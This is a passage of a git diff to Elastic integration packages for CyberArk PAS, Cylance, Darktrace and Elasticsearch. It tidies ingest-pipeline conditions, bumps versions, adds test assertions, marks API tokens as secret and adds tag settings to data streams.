@@ processors: - set: field: event.type value: [error] - if: 'ctx.event?.severity > 6' + if: ctx.event?.severity != null && ctx.event.severity > 6 - rename: field: cyberarkpas.audit.message_id @@ -368,7 +368,7 @@ processors: - set: field: file.path value: '{{{cyberarkpas.audit.file}}}' - if: 'ctx.cyberarkpas.audit?.file != null' + if: ctx.cyberarkpas.audit?.file != null # # Observer fields @@ -394,7 +394,7 @@ processors: field: _tmp.hostname target_field: observer.hostname ignore_missing: true - if: 'ctx.observer?.hostname == null' + if: ctx.observer?.hostname == null # # Enrichment based on message_id # @@ -927,13 +927,13 @@ processors: source: > def clone(def val) { - return val instanceof List? new ArrayList(val) : val; + return val instanceof List ? new ArrayList(val) : val; } def read_field(def map, String name) { if (map == null || !(map instanceof Map)) return null; int pos = name.indexOf("."); - return pos == -1? map[name] - : read_field(map[name.substring(0, pos)], name.substring(pos+1)); + return pos == -1 ? map[name] + : read_field(map[name.substring(0, pos)], name.substring(pos+1)); } String msgID = ctx.event?.code; def actions = params.get(msgID); @@ -974,7 +974,7 @@ processors: - script: lang: painless description: 'Set event.duration from the session duration ("hh:mm:ss")' - if: "ctx._tmp?.duration_hms != null" + if: ctx._tmp?.duration_hms != null source: > long parse_hms(String s) { long cur = 0, total = 0; @@ -1021,22 +1021,22 @@ processors: - append: field: related.ip value: '{{{source.ip}}}' - if: 'ctx.source?.ip != null' + if: ctx.source?.ip != null allow_duplicates: false - append: field: related.ip value: '{{{destination.ip}}}' - if: 'ctx.destination?.ip != null' + if: ctx.destination?.ip != null allow_duplicates: false - append: field: related.ip value: '{{{cyberarkpas.audit.station}}}' - if: 'ctx.cyberarkpas.audit.station != null' + if: ctx.cyberarkpas.audit.station != null allow_duplicates: false - append: field: related.ip value: '{{{cyberarkpas.audit.gateway_station}}}' - if: 'ctx.cyberarkpas.audit.gateway_station != null' + if: ctx.cyberarkpas.audit.gateway_station != null allow_duplicates: false # @@ -1045,22 +1045,22 @@ processors: - append: field: related.user value: '{{{user.name}}}' - if: 'ctx.user?.name != null' + if: ctx.user?.name != null allow_duplicates: false - append: field: related.user value: '{{{source.user.name}}}' - if: 'ctx.source?.user?.name != null' + if: ctx.source?.user?.name != null allow_duplicates: false - append: field: related.user value: '{{{destination.user.name}}}' - if: 'ctx.destination?.user?.name != null' + if: ctx.destination?.user?.name != null allow_duplicates: false - append: field: related.user value: '{{{user.target.name}}}' - if: 'ctx.user?.target?.name != null' + if: ctx.user?.target?.name != null allow_duplicates: false # @@ -1089,7 +1089,7 @@ processors: field: host.name value: '{{{observer.hostname}}}' ignore_empty_value: true - if: 'ctx.host?.name == null' + if: ctx.host?.name == null - network_direction: ignore_missing: true @@ -1102,7 +1102,7 @@ processors: field: process.pid type: long ignore_missing: true - + # # Save only interesting fields under extra_fields and ca_properties # to prevent mapping explosion. Keep the rest under .other (type flattened). @@ -1176,7 +1176,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/cyberarkpas/manifest.yml b/packages/cyberarkpas/manifest.yml index cd8450726a4..248acd14c07 100644 --- a/packages/cyberarkpas/manifest.yml +++ b/packages/cyberarkpas/manifest.yml @@ -1,9 +1,9 @@ name: cyberarkpas title: CyberArk Privileged Access Security -version: "2.19.2" +version: "2.20.0" description: Collect logs from CyberArk Privileged Access Security with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "iam"] conditions: kibana: diff --git a/packages/cylance/_dev/deploy/docker/docker-compose.yml b/packages/cylance/_dev/deploy/docker/docker-compose.yml index ebc9cb90d1d..2801a3ad3f7 100644 --- a/packages/cylance/_dev/deploy/docker/docker-compose.yml +++ b/packages/cylance/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" cylance-protect-udp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=udp /sample_logs/cylance-protect-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=udp /sample_logs/cylance-protect-*.log cylance-protect-tcp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=tcp /sample_logs/cylance-protect-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=tcp /sample_logs/cylance-protect-*.log diff --git a/packages/darktrace/changelog.yml b/packages/darktrace/changelog.yml index b86cdd6db19..c90e902916d 100644 --- a/packages/darktrace/changelog.yml +++ b/packages/darktrace/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml index 81b8a00d092..2ec1692ba0e 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml @@ -9,3 +9,5 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 1 diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml index 53314b710b8..b71ab66f339 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9571 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml index d3819b60c78..2c4f4b106ff 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml @@ -60,3 +60,5 @@ data_stream: listen_port: 9571 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml index 0d9b6eb6f0e..57cccaca329 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9574 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml index be41bb0d476..2799c3dfdd8 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml @@ -2,3 +2,5 @@ fields: tags: - preserve_original_event - preserve_duplicate_custom_fields +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml index 81b8a00d092..57cf8b59b58 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml @@ -9,3 +9,7 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 1 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml index db13b8d1220..40459035336 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,7 @@ data_stream: listen_port: 9572 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 4 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml index 0343a55d8d8..e5f7075c2d8 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml @@ -60,3 +60,7 @@ data_stream: listen_port: 9572 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 4 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml index c18b3883870..e53246e2920 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml @@ -8,3 +8,7 @@ data_stream: listen_port: 9575 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 4 \ No newline at end of file diff --git a/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml b/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml index a9723624791..8517545ab29 100644 --- a/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml +++ b/packages/darktrace/data_stream/model_breach_alert/fields/fields.yml @@ -405,7 +405,7 @@ - name: expiry type: long description: nan - - name: isReferenced + - name: is_referenced type: boolean description: nan - name: name diff --git a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml index 063df1e59b0..de520d458c3 100644 --- a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml +++ b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9573 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml index 81f051da6d4..02d2b21c7a3 100644 --- a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml +++ b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-tls-config.yml @@ -60,3 +60,5 @@ data_stream: listen_port: 9573 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml index cc4f6b075d4..16fb080160e 100644 --- a/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml +++ b/packages/darktrace/data_stream/system_status_alert/_dev/test/system/test-udp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9576 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/docs/README.md b/packages/darktrace/docs/README.md index 64caf73775f..d53a8e5530f 100644 --- a/packages/darktrace/docs/README.md +++ b/packages/darktrace/docs/README.md @@ -1205,7 +1205,7 @@ An example event for `model_breach_alert` looks as following: | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.data.description | | keyword | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.data.visibility | | keyword | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.expiry | nan | long | -| darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.isReferenced | nan | boolean | +| darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.is_referenced | nan | boolean | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.name | nan | keyword | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.restricted | nan | boolean | | darktrace.model_breach_alert.triggered_components.triggered_filters.trigger.tag.thid | nan | long | diff --git a/packages/darktrace/manifest.yml b/packages/darktrace/manifest.yml index 94bdbf2ae19..4476d0137c8 100644 --- a/packages/darktrace/manifest.yml +++ b/packages/darktrace/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: darktrace title: Darktrace -version: "1.14.1" +version: "1.16.0" description: Collect logs from Darktrace with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - network_security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/darktrace-screenshot.png title: Darktrace Model Breach Alert Dashboard Screenshot @@ -46,11 +46,13 @@ policy_templates: title: Public API Token description: Public API Token. required: true + secret: true - name: private_token type: password title: Private API Token description: Private API Token. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/elasticsearch/changelog.yml b/packages/elasticsearch/changelog.yml index da84429c6ac..0e4f61badab 100644 --- a/packages/elasticsearch/changelog.yml +++ b/packages/elasticsearch/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Add support shard_stats.total_count in node metricset + type: enhancement + link: https://github.com/elastic/integrations/pull/9594 +- version: "1.14.0" + changes: + - description: Add support for tags + type: enhancement + link: https://github.com/elastic/integrations/pull/9028 - version: "1.13.1" changes: - description: Make "Total Storage over time" viz consistent with others by using same sourceField diff --git a/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs index dbb3d8ec36b..383aa3be0b9 100644 --- a/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/audit/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/audit/manifest.yml b/packages/elasticsearch/data_stream/audit/manifest.yml index 786583575ce..2bdd018b00e 100644 --- a/packages/elasticsearch/data_stream/audit/manifest.yml +++ b/packages/elasticsearch/data_stream/audit/manifest.yml @@ -11,6 +11,12 @@ streams: show_user: true default: - /var/log/elasticsearch/*_audit.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Audit logs description: Collect Elasticsearch audit logs using log input diff --git a/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs index 1b5dbca372f..6d6d9806150 100644 --- a/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/ccr/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/ccr/manifest.yml b/packages/elasticsearch/data_stream/ccr/manifest.yml index 464aaef5ce3..58b4bd72944 100644 --- a/packages/elasticsearch/data_stream/ccr/manifest.yml +++ b/packages/elasticsearch/data_stream/ccr/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs index 009433c8128..2b63448e9c3 100644 --- a/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/cluster_stats/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/cluster_stats/manifest.yml b/packages/elasticsearch/data_stream/cluster_stats/manifest.yml index 0b844d41710..fa573dc414a 100644 --- a/packages/elasticsearch/data_stream/cluster_stats/manifest.yml +++ b/packages/elasticsearch/data_stream/cluster_stats/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs index c10163dea79..3a33108473f 100644 --- a/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/deprecation/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/deprecation/manifest.yml b/packages/elasticsearch/data_stream/deprecation/manifest.yml index 01ac75f8f1d..0853d005812 100644 --- a/packages/elasticsearch/data_stream/deprecation/manifest.yml +++ b/packages/elasticsearch/data_stream/deprecation/manifest.yml @@ -11,6 +11,12 @@ streams: show_user: true default: - /var/log/elasticsearch/*_deprecation.json + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Deprecation logs description: Collect Elasticsearch deprecation logs using log input diff --git a/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs index 22a2a68cf87..cf574e56482 100644 --- a/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/enrich/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/enrich/manifest.yml b/packages/elasticsearch/data_stream/enrich/manifest.yml index f19b80cf32c..48f416cfeea 100644 --- a/packages/elasticsearch/data_stream/enrich/manifest.yml +++ b/packages/elasticsearch/data_stream/enrich/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs b/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs index f1a9a299bf2..3c6d5e09b10 100644 --- a/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs +++ b/packages/elasticsearch/data_stream/gc/agent/stream/log.yml.hbs @@ -2,6 +2,10 @@ paths: {{#each paths as |path i|}} - {{path}} {{/each}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition}} condition: {{ condition }} {{/if}} diff --git a/packages/elasticsearch/data_stream/gc/manifest.yml b/packages/elasticsearch/data_stream/gc/manifest.yml index b2d07508e53..171778e451d 100644 --- a/packages/elasticsearch/data_stream/gc/manifest.yml +++ b/packages/elasticsearch/data_stream/gc/manifest.yml @@ -12,6 +12,12 @@ streams: default: - /var/log/elasticsearch/gc.log.[0-9]* - /var/log/elasticsearch/gc.log + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false template_path: log.yml.hbs title: Garbage Collection logs description: Collect Elasticsearch gc logs using log input diff --git a/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs index 788127f47a4..e850f411699 100644 --- a/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/index/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/index/manifest.yml b/packages/elasticsearch/data_stream/index/manifest.yml index ae8d2db6a04..4bca9d225a1 100644 --- a/packages/elasticsearch/data_stream/index/manifest.yml +++ b/packages/elasticsearch/data_stream/index/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs index 27956a588e5..0fedf2b561f 100644 --- a/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/index_recovery/agent/stream/stream.yml.hbs @@ -18,6 +18,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/index_recovery/manifest.yml b/packages/elasticsearch/data_stream/index_recovery/manifest.yml index 95454d88b25..4cddb483b96 100644 --- a/packages/elasticsearch/data_stream/index_recovery/manifest.yml +++ b/packages/elasticsearch/data_stream/index_recovery/manifest.yml @@ -25,3 +25,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs index 8f9d6eed8f9..0f393a24d48 100644 --- a/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/index_summary/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/index_summary/manifest.yml b/packages/elasticsearch/data_stream/index_summary/manifest.yml index 0f309a736b0..6b05eefa1d0 100644 --- a/packages/elasticsearch/data_stream/index_summary/manifest.yml +++ b/packages/elasticsearch/data_stream/index_summary/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs index cb28b8febce..078cd873e71 100644 --- a/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/ingest_pipeline/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml b/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml index 7c7d10972dd..1cc401080a1 100644 --- a/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml +++ b/packages/elasticsearch/data_stream/ingest_pipeline/manifest.yml @@ -19,4 +19,10 @@ streams: description: How often to collect the processor-level metrics. Number between 0 and 1. required: true show_user: true - default: "0.25" \ No newline at end of file + default: "0.25" + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false \ No newline at end of file diff --git a/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs index c1ecc3f727d..89e05f43563 100644 --- a/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/ml_job/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/ml_job/manifest.yml b/packages/elasticsearch/data_stream/ml_job/manifest.yml index bea3f279107..c877d7256a4 100644 --- a/packages/elasticsearch/data_stream/ml_job/manifest.yml +++ b/packages/elasticsearch/data_stream/ml_job/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs index d48813bc6d5..75446e13686 100644 --- a/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/node/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/node/manifest.yml b/packages/elasticsearch/data_stream/node/manifest.yml index 5d314720aae..75eeaad4e19 100644 --- a/packages/elasticsearch/data_stream/node/manifest.yml +++ b/packages/elasticsearch/data_stream/node/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs index 22540bbc057..45c0d5f3dce 100644 --- a/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/node_stats/agent/stream/stream.yml.hbs @@ -17,6 +17,10 @@ period: {{period}} {{#if ssl}} ssl: {{ssl}} {{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if leaderelection }} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} diff --git a/packages/elasticsearch/data_stream/node_stats/fields/fields.yml b/packages/elasticsearch/data_stream/node_stats/fields/fields.yml index e1d8819f115..326f74dd131 100644 --- a/packages/elasticsearch/data_stream/node_stats/fields/fields.yml +++ b/packages/elasticsearch/data_stream/node_stats/fields/fields.yml @@ -4,6 +4,11 @@ - name: indices type: group fields: + - name: shard_stats + type: group + fields: + - name: total_count + type: long - name: bulk type: group fields: diff --git a/packages/elasticsearch/data_stream/node_stats/manifest.yml b/packages/elasticsearch/data_stream/node_stats/manifest.yml index 5797dae7191..6eaf5335793 100644 --- a/packages/elasticsearch/data_stream/node_stats/manifest.yml +++ b/packages/elasticsearch/data_stream/node_stats/manifest.yml @@ -18,3 +18,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git a/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs b/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs index b954f53394b..7207c49a0d9 100644 --- a/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs +++ b/packages/elasticsearch/data_stream/pending_tasks/agent/stream/stream.yml.hbs @@ -18,6 +18,10 @@ period: {{period}} ssl: {{ssl}} {{/if}} {{#if leaderelection }} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} {{#if condition }} condition: ${kubernetes_leaderelection.leader} == true and {{ condition }} {{ else }} diff --git a/packages/elasticsearch/data_stream/pending_tasks/manifest.yml b/packages/elasticsearch/data_stream/pending_tasks/manifest.yml index ffd3e9f4980..082aa777f12 100644 --- a/packages/elasticsearch/data_stream/pending_tasks/manifest.yml +++ b/packages/elasticsearch/data_stream/pending_tasks/manifest.yml @@ -17,3 +17,9 @@ streams: required: true show_user: true default: 10s + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false diff --git 